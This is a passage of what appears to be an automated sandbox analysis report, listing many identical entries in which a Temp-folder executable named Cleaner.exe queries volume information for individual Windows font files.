Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
